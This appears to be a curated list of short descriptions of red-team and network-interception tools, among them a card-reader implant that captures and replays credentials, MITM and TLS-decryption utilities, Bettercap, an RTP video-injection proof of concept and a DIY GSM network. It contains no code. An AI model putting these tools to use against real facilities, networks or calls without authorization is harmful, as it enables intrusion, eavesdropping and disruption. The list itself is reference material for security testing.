The Tick is the next evolution in covert access control system implants. Designed for a seamless integration behind card readers, The Tick silently intercepts, logs, and replays access credentials with greater efficiency and stealth than ever before. Compatible with a wide range of RFID systems, provides invaluable (to red teamers) insights into facility (in)security, while enabling advanced credential injection.
Once installed behind an access control unit, you can interact with it over Bluetooth or wifi to configure it, extract what it's captured so far, and upgrade the firmware.
A shell script to automate the setup of Linux router for IoT device traffic analysis and SSL MITM. It looks like it assumes that you're running it on an OpenWRT device (but I could be wrong).
A tool for testing for certificate validation vulnerabilities of TLS connections made by a client device or an application. This could also be useful if you're trying to reverse engineer the API a mobile app uses.
Intercepting and interfering with DNS traffic from your OpenWRT firewall.
USBQ is a Python-based programming framework for monitoring and modifying USB communications. Uses the kernel module from USBiquitous to implement the MITM part in the USB stack. Really does need an external device to actually sit in between the device and the system to sniff the data. Hmm.
TinyCheck allows you to easily capture network communications from a smartphone or any device which can be associated to a Wi-Fi access point in order to quickly analyze them. This can be used to check if any suspect or malicious communication is outgoing from a smartphone, by using heuristics or specific Indicators of Compromise (IoCs). In order to make it working, you need a computer with a Debian-like operating system and two Wi-Fi interfaces. The best choice is to use a Raspberry Pi (2+) a Wi-Fi dongle and a small touch screen. This tiny configuration (for less than $50) allows you to tap any Wi-Fi device, anywhere.
Python utility, which decrypts TLS encrypted XMPP traffic by acting as an active MiTM and looking for STARTTLS requests.
A proof-of-concept utility which allows DoS attacks against IP videophones by sampling RTP sequencing information and using it to inject frames from an arbitrary video stream into the conversation. Can also interact with the audio component of such a call.
Bettercap is a modular man-in-the-middle attacking tool written in Go. It's designed to make it easy to write your own proxies to attack traffic from the sidelines. It's designed to run on pretty much any worthwhile pentesting platform.
howto build a personal gsm cellular network using linux, a RasPi, and an SDR.